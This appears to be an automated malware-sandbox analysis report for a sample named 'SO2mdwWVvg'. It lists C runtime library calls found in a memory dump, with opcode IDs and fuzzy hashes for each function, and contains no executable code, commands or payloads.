                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
                                                                  • String ID:
                                                                  • API String ID: 2667508507-0
                                                                  • Opcode ID: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
                                                                  • Instruction ID: b693fbcf2c4df96658c68d8e96a634af38a3f3d527967bee7eb6cf3b607a9dea
                                                                  • Opcode Fuzzy Hash: 69ae3169a039df52091071606f3a1e8249e5672861753253b765f1f3427f6835
                                                                  • Instruction Fuzzy Hash: 8AB16F302587144BEF9AFB74A8567FA73D5EB95310F404D2EA84ACB2D3EE349905C782
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                                                  • String ID:
                                                                  • API String ID: 2887643383-0
                                                                  • Opcode ID: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
                                                                  • Instruction ID: 3de8b206026f3c76c8a93a34e40b636d40b16faa16f6c85a27b20507eb2093fe
                                                                  • Opcode Fuzzy Hash: ccde22759ef2e3f78cce72c2939bc019c04d076555ce75b1dc7219c434147f26
                                                                  • Instruction Fuzzy Hash: 2051F431668A084FE789EB3CA4567F973D1FB99300F504A6FE44BC72D7DE249906C681
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 3962633935-0
                                                                  • Opcode ID: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
                                                                  • Instruction ID: 53bfc251ad44ed0a3029f19d8062f2daf846e68a021882da886f8ec03595f8b3
                                                                  • Opcode Fuzzy Hash: 8dddd40cba0b96657f5797606e885a34095d890d14caea9c99b50cb58fb4cd36
                                                                  • Instruction Fuzzy Hash: DE513770528B098FE715AF68E8853B5B3D0FB59710F114A5FE84ACB2A2D734D842CBC2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
                                                                  • Instruction ID: 726f3a92c683a9ec64a4c62d5afed04b6239f2ad0525802e99a1ba750356005a
                                                                  • Opcode Fuzzy Hash: a45fc30acfc366bf9b051932b8caba1d9495d79fe219d51417d01d77f5c5bb34
                                                                  • Instruction Fuzzy Hash: 6641E731358B1D0BEB69AA3C68557FA37D5E796321F14492EE887C7293ED20D807C781
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                                                                  • String ID:
                                                                  • API String ID: 304646821-0
                                                                  • Opcode ID: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
                                                                  • Instruction ID: 822c8ceeae1fe1b5c498dba68744639c86b27d0a35103cf81693a1ee9438d6ab
                                                                  • Opcode Fuzzy Hash: aa8b06c3288e952ecbdf324b898e62218ab50926b5a5fcb56ef63d4126ab63d5
                                                                  • Instruction Fuzzy Hash: F9518F70114A494FEFEAEF28E4917EA77E0EB58310F140A9AE856CF2D6D774D841CB81
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_snprintffreemalloc$FreeHeap_callnewh_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 343393124-0
                                                                  • Opcode ID: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
                                                                  • Instruction ID: 10ae3d3731410cc4c832fb24a97504254f628b642c1177833ae72656ba57151c
                                                                  • Opcode Fuzzy Hash: ec25d155d64a04f5a4d69300301c4abe570cf977cc4f299410c5493cce9685bc
                                                                  • Instruction Fuzzy Hash: 0F41933031CA480FEE9AAB2C78157F477D2E789310F449A5ED0CEC7297DA259C42CB85
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$free$FreeHeap_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 415550720-0
                                                                  • Opcode ID: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
                                                                  • Instruction ID: a83a410d7e784652427c476ef598cd62c2ff19dadd0fdd134ab31a5cbb8cee9f
                                                                  • Opcode Fuzzy Hash: 1ec553c66c746d099e6808a9a78dd35a746a31c899afe7e7e07bb86eb44d6d70
                                                                  • Instruction Fuzzy Hash: D9218031228A194BEB96FB3CA4617EEB3D1FB98340F544D6EB44AC73C2DD249945C781
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
                                                                  • Instruction ID: 53a6043c4fc7a1a647b7b1c833b46da07ab4402cb14d52c9c6ee5b4caaa3a3ee
                                                                  • Opcode Fuzzy Hash: 1a9f3c273fde667eee1e28420fd08ba4f6fdad69626380ca01bd7ea3b71185bb
                                                                  • Instruction Fuzzy Hash: 3A01F43022080D4EFA9BAB74EA713E83394FF19325F644E46E419CF1EBCB781840CA52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                  • String ID:
                                                                  • API String ID: 2026495703-0
                                                                  • Opcode ID: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
                                                                  • Instruction ID: 72f9981d7cf5392373f4e44c59f1d0851aef4aed774c4b75af1bbc41385b01cc
                                                                  • Opcode Fuzzy Hash: e42e8bb37c17fb866d7ab9e581f67a34594f586a0dca43f1649d0ab14eded3ec
                                                                  • Instruction Fuzzy Hash: 7A114F31618B044FEBA9AF68A45579676E1F78C310F54595EE08AC3296DA349C4287C1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 634798775-0
                                                                  • Opcode ID: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
                                                                  • Instruction ID: d337b9e497603fffd4ee0e7c658340c16cf59516097bc31a871e4ad887934f50
                                                                  • Opcode Fuzzy Hash: 0aeef574da07145cfdd41d53376bf3e81e49c591176030f61e29d107625eec6d
                                                                  • Instruction Fuzzy Hash: C0511C30218F0D0BEEEA6A6DB45A3B573D1E758310F254A2FD45AC72D3EA60DC52C6C2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  • Opcode ID: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
                                                                  • Instruction ID: 17b5f281288eea61b142535045d04ee3b96ec77497267179caf0570733474f09
                                                                  • Opcode Fuzzy Hash: 7862a7d32f1c9ad9b973ef17a076326fdf486dc74a254423f992730849a2d722
                                                                  • Instruction Fuzzy Hash: 6421F63144C71C4AE768AAA8A4422A6B7D4E786350F150A2FE9DBC7153F5509D42C2C2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  • Opcode ID: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
                                                                  • Instruction ID: f6d8e90d42ec011ab2ab9ccc6ba83791fb010628e6e67ab0e5bc9afdc99fe65a
                                                                  • Opcode Fuzzy Hash: 6fcaa51569f33512e2090195287e243e2f4399f94586e7a5485698e02a016b7c
                                                                  • Instruction Fuzzy Hash: 8321387061C6A94FEBA6E728E0D47BA77C0E789355F444E6FE0A6CF1D1D9608841C345
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc$FreeHeap_errno_getptdfree
                                                                  • String ID:
                                                                  • API String ID: 3311824342-0
                                                                  • Opcode ID: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
                                                                  • Instruction ID: 49214ae9c4ddead304b703244c7096ae32e3c6fa645bf0e7eccdd77b60aa0de6
                                                                  • Opcode Fuzzy Hash: d0a27817efde19c6f8d87261e0c14dccd853f4b6914fa58adb41ed9447b39478
                                                                  • Instruction Fuzzy Hash: 8AC19730628A448FFFEAEB18B8517B573E1F75A321F60452BD446C71A5DA789843C782
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B
                                                                  • API String ID: 1812809483-1255198513
                                                                  • Opcode ID: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
                                                                  • Instruction ID: f2506c5862b5c0c843cfd16bc1de2ff4e2e511110abc98b76c884ee3880ce080
                                                                  • Opcode Fuzzy Hash: 6354dd7fc53b9600f59efb332da70efbe254211307fc8429e275f3790f02590a
                                                                  • Instruction Fuzzy Hash: 95118F30618A088FDB95EF59A4857A6B7D1FB98324F504BAEA419C72A1CB74C944CB82
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
                                                                  • Instruction ID: 9431355be1b4227132fe047b909c173ae63f22b90072580022f1403640e94096
                                                                  • Opcode Fuzzy Hash: dd038f529a1152db983726e88818db10f6b0a149fc053e6d5e168077c86b9374
                                                                  • Instruction Fuzzy Hash: EC615F31318A084BEF9AEB28A4917ED77D1EB94310F240E1EE44BCB1D7DE24DA46C791
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3442832105-0
                                                                  • Opcode ID: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
                                                                  • Instruction ID: 877fda3f505ef10e6ef50b45d8c907ec2ee78214862a117d6937c77cd3ceb11e
                                                                  • Opcode Fuzzy Hash: fc51f4615cf0e27a482f6b22ff4d87c06e4feeef8bc37e62b75beb2dd9a3da3a
                                                                  • Instruction Fuzzy Hash: 7E61CA30518A488FEB85EF68E8857EA77E5FB98305F00496BE44AC71D2DF34D945CB81
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
                                                                  • Instruction ID: a055f08c31a5ea0317cf1a825cc6b5621fbcafceefc5aaab2d7f7fddd8736ef3
                                                                  • Opcode Fuzzy Hash: 0ccdd68a0240799a77ae4be0c48a7008bd312d06eef73861b9d961f3f66470dc
                                                                  • Instruction Fuzzy Hash: 8851B731218A154FDB5DDF3CA4916BA73D1FB96310F44496EE88BC7286EE20FC42C685